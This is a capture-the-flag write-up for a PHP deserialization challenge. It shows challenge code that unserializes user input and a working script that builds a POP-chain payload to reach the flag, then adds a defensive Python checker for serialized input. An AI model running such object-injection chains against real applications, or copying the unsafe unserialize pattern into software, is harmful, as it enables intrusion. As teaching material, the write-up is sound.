[SWPUCTF 2021 Freshman Competition] pop
Challenge source code
<?php
error_reporting(0);
show_source("index.php");
class w44m{
    private $admin = 'aaa';
    protected $passwd = '123456';
    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}
class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}
$w00m = $_GET['w00m'];
unserialize($w00m);
?>
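The exploitable sink is the include() call in w44m::Getflag(), which reads the flag.
w33m::__toString can call the Getflag method: set its w00m to new w44m() and its w22m to Getflag.
w22m::__destruct then fits exactly: set its w00m to new w33m(), and when echo treats the w33m object as a string, the __toString method is triggered.
Because the admin property of the w44m class is private and passwd is protected, their serialized names contain invisible characters, so the payload also has to be URL-encoded.
The payload is as follows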
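<?php
// Only the properties are needed; methods are not part of serialized data.
class w44m{
    private $admin = 'w44m';
    protected $passwd = '08067';
}
class w22m{
    public $w00m;
}
class w33m{
    public $w00m;
    public $w22m;
}
$w44m=new w44m();
$w22m=new w22m();
$w33m=new w33m();
// w22m::__destruct echoes w00m, which triggers w33m::__toString
$w22m->w00m=$w33m;
// w33m::__toString calls $this->w00m->{$this->w22m}()
$w33m->w00m=$w44m;
// method name must be a quoted string (a bare word is an undefined constant)
$w33m->w22m='Getflag';
// URL-encode so the NUL bytes in the private/protected names survive
echo urlencode(serialize($w22m));
?>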
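The invisible characters mentioned above are NUL bytes that PHP puts into the serialized names of private and protected properties. As an added example (not part of the original write-up), the Python code below parses a serialized value the way a log or gateway check would, listing every class it would instantiate and each property's visibility; `list_objects`, `disallowed_classes`, `ALLOWED_CLASSES` and the sample input are assumptions made for illustration.

```python
from urllib.parse import unquote_to_bytes

ALLOWED_CLASSES = set()  # assumption: this endpoint expects plain data only
# Constructed sample: an array holding one w44m object with the challenge's
# default property values; %00 is the URL-encoded NUL marker byte.
SAMPLE = ('a:1:{i:0;O:4:"w44m":2:{s:11:"%00w44m%00admin";s:3:"aaa";'
          's:9:"%00*%00passwd";s:6:"123456";}}')

def visibility(name):
    if name.startswith(b"\x00*\x00"):          # \0*\0prop
        return name[3:].decode(), "protected"
    if name.startswith(b"\x00"):               # \0Class\0prop
        return name.split(b"\x00")[2].decode(), "private"
    return name.decode(), "public"

def _read(buf, pos, objs):
    # Parse one value at buf[pos]; return (scalar bytes or None, next pos).
    tag = buf[pos:pos + 1]
    if tag == b"N":                            # N;
        return None, pos + 2
    if tag in (b"i", b"b", b"d", b"r", b"R"):  # i:5; b:1; d:0.5; r:1;
        end = buf.index(b";", pos)
        return buf[pos + 2:end], end + 1
    if tag not in (b"s", b"a", b"O"):          # unknown tag: caller rejects
        raise ValueError("unsupported tag %r at %d" % (tag, pos))
    props = None
    if tag != b"a":                            # s:<len>:"..." or O:<len>:"cls"
        colon = buf.index(b":", pos + 2)
        start = colon + 2
        end = start + int(buf[pos + 2:colon])  # length counts bytes
        if tag == b"s":
            return buf[start:end], end + 2     # skip closing ";
        props = []
        objs.append((buf[start:end].decode(), props))
        pos = end                              # pos + 2 now lands on the count
    brace = buf.index(b":{", pos + 2)
    count, pos = int(buf[pos + 2:brace]), brace + 2
    for _ in range(count):                     # key/value pairs
        key, pos = _read(buf, pos, objs)
        if props is not None:
            props.append(visibility(key))
        _, pos = _read(buf, pos, objs)
    return None, pos + 1                       # skip }

def list_objects(query_value):
    objs = []
    _read(unquote_to_bytes(query_value), 0, objs)
    return objs

def disallowed_classes(query_value):
    return sorted({c for c, _ in list_objects(query_value)} - ALLOWED_CLASSES)
```

On the PHP side, the matching control is the `allowed_classes` option of `unserialize()`, or a data-only format such as JSON for user input.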
